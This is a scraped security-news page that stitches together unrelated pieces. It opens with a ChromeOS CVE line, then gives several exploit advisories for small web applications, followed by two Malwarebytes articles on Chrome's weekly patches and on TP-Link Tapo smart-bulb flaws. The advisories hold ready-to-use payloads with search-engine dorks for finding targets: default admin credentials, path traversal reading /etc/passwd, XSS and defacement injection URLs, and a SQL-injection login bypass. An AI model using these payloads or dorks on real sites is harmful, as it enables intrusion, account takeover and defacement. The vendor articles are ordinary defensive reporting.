Inappropriate implementation in OS in Google Chrome on ChromeOS prior to 75.0.3770.80 allowed a remote attacker to perform arbitrary read/write via a malicious file. (Chromium security severity: Critical)

CVE-2019-13689

Gusto Recipes Management version 1.5.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Gusto - Recipes Management v1.5.1 System Insecure Settings Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.elmanawy.info/demo/gusto/                                                                              |  | # Dork      : /profile/1-gusto                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] appears to leave a default administrative account in place post installation.[+] use Login : Email    : admin@admin.com                 Password : 123456 [+] http://127.0.0.1/mbc1org/admin/dashboard  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gusto Recipes Management 1.5.1 Insecure Settings

Groupoffice version 3.4.21 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Groupoffice v3.4.21 Directory Traversal Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.group-office.com                                                                                         || # Dork      : Powered by Group-Office                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /compress.php?file=../../../../../../../../../../windows/win.ini[+] http://127.0.0.1/aa-hwkorg/compress.php?file=../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Groupoffice 3.4.21 Directory Traversal

Grawlix CMS version 1.1.1 suffers from a cross site scripting vulnerability.

    ============================================================================================================================| # Title     : Grawlix Cms v1.1.1 xss Vulnerability                                                                       || # Author    : indoushka                                                                                                  || # Tested on : windows 10 Français V.(Pro)                                                                                || # Vendor    : http://getgrawlix.com/                                                                                     |  | # Dork      : Powered by The Grawlix CMS                                                                                 |============================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/obarandacom/_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] php info : http://127.0.0.1/obarandacom/info.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Grawlix CMS 1.1.1 Cross Site Scripting

Gravigra CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Gravigra CMS v1.0 Sql injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.alwafaagroup.com/                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /news.php?nid=1 ( inject her )[+] use payload : http://127.0.0.1/gravigracom/news.php?nid=1 ( inject her )Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gravigra CMS 1.0 SQL Injection

Global Domains International version 2.0 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Global Domains International v2.0 HTML inject Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.worldsite.ws/                                                                                          || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected File : /index.dhtml [+] use Payload : /index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1/worldsitews/index.dhtml?sponsor=gditrafficws'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Global Domains International 2.0 HTML Injection

GetSimple CMS version 3.3.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : GetSimple CMS v3.3.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://get-simple.info/                                                                                            || # Dork      :  © 2009-2014 GetSimple CMS – Version 3.3.2                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] LIne 5 Se7 y0ur T@rg3t .[+] XSS Reflected - Jquery v1.7.1 :<html><head>  <meta charset="utf-8">  <title>XSS Reflected - Jquery v1.7.1 </title>  <script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>  <script>    $(function() {      $('#users').each(function() {        var select = $(this);        var option = select.children('option').first();        select.after(option.text());        select.hide();      });    });  </script></head>  <body>  <form method="post">    <p>      <select id="users" name="users">        <option value="xssreflected"><script>alert(&#x27;xssreflected - jquery v1.7.1 by - indoushka thnx to @firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>      </select>    </p>  </form></body></html>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GetSimple CMS 3.3.2 Cross Site Scripting

G and G Corporate CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0 Auth by Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : User & Pass : 'or''='[+] http://wwwpriolinoxeu/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

G And G Corporate CMS 1.0 SQL Injection

Categories: Exploits and vulnerabilities
Tags: stable channel

Tags:  weekly updates

Tags:  CVE-2023-4427

Tags:  CVE-2023-4428

Tags:  CVE-2023-4429

Tags:  CVE-2023-4430

Tags:  CVE-2023-4431

Tags:  use after free

Tags:  out of bounds

Tags:  heap corruption

The first of Chrome's now weekly security updates fixes five vulnerabilities.



(Read more...)




The post Update now! Google Chrome's first weekly update has arrived appeared first on Malwarebytes Labs.

Google has published details about the first weekly update for the Chrome browser. Recently Google announced that it would start shipping weekly security updates for the Stable channel (the version most of us use). Regular Chrome releases will still come every four weeks, but to get security fixes out faster, updates to address security and other high impact bugs will be scheduled weekly.

This should also help in the reduction of a patch gap in the Chome release cycle. When a Chrome security bug is fixed, the fix is added to the public Chromium source code repository. The fix is then tested and evaluated before it goes to the Stable Channel. The gap is the time between the patch appearing in the Chromium repository and it being shipped in a Stable channel update.

The latest update has fixes for five vulnerabilities. Four of these vulnerabilities have been classified with a High importance and one as Medium. All these vulnerabilities have been reported by external researchers between August 1 and August 7, 2023.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are:

CVE-2023-4430, a use after free (UAF) vulnerability in Vulkan, in Google Chrome prior to 116.0.5845.110, which allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. Vulkan is a modern cross-platform graphics and compute API (application programming interface) that provides high-efficiency, low-level access to modern GPUs (graphics processing units) used in a wide variety of devices from PCs to smartphones.

UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program.

CVE-2023-4429 is another use after free vulnerability, this time in Loader, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2023-4428 is an out of bounds memory access in CSS, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions.

CVE-2023-4427 is an out of bounds memory access in V8, Google’s open-source JavaScript engine, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

CVE-2023-4431 is the vulnerability listed as Medium severity. It's an out of bounds memory access vulnerability in Fonts in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

**How to protect yourself**

If you’re a Chrome user on Windows, Mac, or Linux, you should update  to version 116.0.5845.110/.111 at your earliest convenience.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is **relaunch** the browser in order for the update to complete.

_Google Chrome is up to date_

After the update, your version should be 116.0.5845.110 for Mac and Linux, and 116.0.5845.111 for Windows, or later.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! Google Chrome's first weekly update has arrived

Categories: Business
Tags: business

Tags:  home

Tags:  personal

Tags:  router

Tags:  wi-fi

Tags:  wireless

Tags:  network

Tags:  home

Tags:  bulb

Tags:  smart bulb

Tags:  IoT

Tags:  app

Tags:  TP-Link

We take a look at reports that a smart lightbulb and app vulnerability could potentially put your Wi-Fi password at risk.



(Read more...)




The post Smart lightbulb and app vulnerability puts your Wi-Fi password at risk appeared first on Malwarebytes Labs.

New research highlights another potential danger from IoT devices, with a popular make of smart light bulbs placing your Wi-Fi network password at risk. Researchers from the University of London and Universita di Catania produced a paper explaining the dangers of common IoT products. In this case, how smart bulbs can be compromised to gain access to your home or office network.

If you use the TP-Link Tapo L530 E smart bulb and the TP-Link Tapo app, you will have some smart bulb related reading in your immediate future.

Bleeping Computer reports that no fewer than 10 million app installations exist via Google Play. From the app description:

> The Tapo app helps you set up the Tapo smart devices within minutes and puts everything you need at the tip of your fingers
> 
> • Control your smart device from anywhere.
> 
> • Control the device via voice with Google Home and Amazon Echo.
> 
> • Preset Away mode to make it seem like someone is home.
> 
> • Set a countdown timer to automatically turn the device on or off.
> 
> • Schedule when to turn the device on or off automatically at times.

All fairly standard fare where smart home lighting is concerned. The bulbs can connect to your router, and the bulbs can be controlled via the relevant app. You may well have a similar setup in your own home. In this case however, Italian researchers have shone a light on more insecure issues and practices from smart products which make using them a potentially risky proposition.

Multiple high severity vulnerabilities exist which allow for password retrieval and device manipulation, with four issues in total.

One vulnerability, with a CVSS score of 7.6 out of 10) allows for attackers to retrieve verification keys through brute force, or by decompiling the Tapo app itself. The other high severity flaw, wtih a CVSS of 8.8, is related to incorrect authentication of the bulb, which means the device can be impersonated, allowing for Tapo password theft and device manipulation.

The other two issues, which are not as severe, related to lack of checks of received messages with regard to how old they are and a lack of randomness during encryption.

What is the potential for damage where the “severe” vulnerabilities are concerned? Well, in a worst case scenario someone could potentially swipe your Wi-Fi password via the Tapo app and then have access to all the devices on said network.

Bleeping Computer notes a few wrinkles in this attack plan. The most important of which is that the device would need to be in setup mode in order for the attack to strike gold. While you probably wouldn’t expect many people to have bulbs plugged in but not set up, the attacker can get around this. Namely: With a few clicks of the app, they can deauthenticate your light bulb thus forcing the need for a fresh setup. 

In terms of addressing these flaws, the researchers mention that they made use of TP-Link’s Vulnerability Research Program (VRP) to report all four issues. TP-Link responded that they have started work on fixes for both bulb and app. There is no specific date mentioned for this at time of writing. There are some workarounds suggested to “fix” these issues, but they’re aimed at the manufacturers as opposed to the users.

You can, and should, practice good security when dealing with any product making use of your home or office network. Strong passwords, multi-factor authentication, even turning off products that won't be in use for a significant period of time.

Where the above TP-Link problems are concerned, users should keep the official website handy for security update notifications and ensure all apps and firmware are up to date whenever possible. You should also do this for all of your other smart appliances: Baby monitors, webcams, security systems, and utility service controls. Smart homes are here to stay, and it’s up to us to ensure we’re not providing easy inroads for attackers to exploit.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#google